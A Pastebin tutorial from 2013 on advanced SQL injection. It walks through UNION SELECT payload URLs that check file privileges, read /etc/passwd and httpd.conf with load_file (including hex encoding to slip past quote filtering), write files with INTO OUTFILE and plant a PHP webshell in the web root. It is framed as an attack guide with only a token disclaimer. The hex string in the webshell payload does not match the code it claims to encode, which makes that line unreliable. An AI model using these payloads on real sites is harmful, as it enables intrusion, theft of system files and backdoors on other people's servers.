API tools faq
paste
Advertisement
striker123

SQL injection advance

striker123
Apr 6th, 2013
304
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
MySQL 4.23 KB | None | 0 0
raw download clone embed print report
  1. First of all hello to all readers whoever is reading this article. Once again I am going to tell you about advance SQL Injection. As this is my second article on SQL Injection, I am not going to tell you about the basic SQLi stuff and I assume that you’ve already read my previous article about URL Based SQL Injection. If you haven’t read that, please go on the following link:
  2.  
  3. http://pastebin.com/ywGhfNCn
  4.  
  5. This time I am going to tell you about reading (Local File Inclusion) and writing (PHP Code Writing) file through SQL Injection. First of all in order to read or write the files from the database server (usually web servers because 90% cases both database and web server is the same computer), we must have file privileges.
  6.  
  7. Let us assume the example of previous article having the following URL:
  8.  
  9.  
  10.  
  11. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,3,4
  12.  
  13.  
  14.  
  15. Now assuming the vulnerable column is 3, we can check the current user by injecting @@user or user() in place of 3:
  16.  
  17.  
  18.  
  19. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,user(),4
  20.  
  21.  
  22.  
  23. If the user is root@localhost, then chances of file privileges are more. If your target doesn’t have ‘root’ as a user, don’t loose your heart we still might have file privileges. To check the file privileges we can execute the following query:
  24.  
  25.  
  26.  
  27. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,file_priv,4 where username=user();
  28.  
  29.  
  30.  
  31. If we are getting a ‘Ythen we have file privileges and we can read or write files. But if it doesn’t reply ‘Y’ we can still try by reading a file from the server. The file which we should read is/etc/passwd’ as it is usually available to all users on linux/unix platform. To read the files from the server we will use the function load_file():
  32.  
  33.  
  34.  
  35. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(/etc/passwd’),4
  36.  
  37.  
  38.  
  39. Sometimes, the apostrophe () is blocked in the URL so we can encode our file location in hexadecimal code like below:
  40.  
  41.  
  42.  
  43. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(0x2f6574632f706173737764),4
  44.  
  45.  
  46.  
  47. NOTE: Don’t forget to put ‘0x’ before the hexadecimal code.
  48.  
  49. If we are able read the passwd file, then we may try for other configuration files for further exploitations, like httpd.conf.
  50.  
  51. In order to write files on the server we must note that if the apostrophe is blocked in the URL then we cannot write the file on the server as it require the use of apostrophe. Now as we know apostrophe is required, let us assume that apostrophe is not blocked so we can write the file. To write a file on the server we will be usingINTO OUTFILEas below:
  52.  
  53.  
  54.  
  55. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,’Striker is here’,4 INTO OUTFILE/tmp/pentest.txt’–
  56.  
  57.  
  58.  
  59. It is a good practice to write files in /tmp directory, as all users have writing priviliges in /tmp directory. We can read the file from /tmp directory again to confirm:
  60.  
  61.  
  62.  
  63. http://www.site.com/news.php?id=-4 UNION ALL SELECT 1,2,load_file(/tmp/pentest.txt’),4
  64.  
  65.  
  66.  
  67. After confirming the file which we’ve written we can write a webshell on the target website after encoding the shell code into hexadecimal. Assuming that web directory is/var/www/html/(which we can confirm after reading httpd.conf) and code which we want to write in test.php is<?php echo  “Hello striker is here”  ?>, the URL will be:
  68.  
  69.  
  70.  
  71. http://www.site.com/news.php?id=-4 UNION ALL SELECT1,2,unhex(3c3f706870206563686f2020221c4b7972696f6e204861636b696e67205475746f7269616c7322201d203f3e),4 INTO OUTFILE/var/www/html/test.php’–
  72.  
  73.  
  74.  
  75. As you might’ve noticed that the code which we are going to write must be encoded in hexadecimal else it will not work. Now we can execute the code by just going to the URL:
  76.  
  77.  
  78.  
  79. http://www.site.com/test.php
  80.  
  81.  
  82.  
  83. This is how you can read and write files on a server using SQL Injection. Using the above method one can write malicious code, e.g. webshells on a website using SQL Injection vulnerability. I hope some of you will find this useful.
  84.  
  85. Disclaimer: Please do not use this information to harm anyone, this article is for education purpose only.
  86.  
  87. Like my Page
  88. https://www.facebook.com/Str1.k3r.gov
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!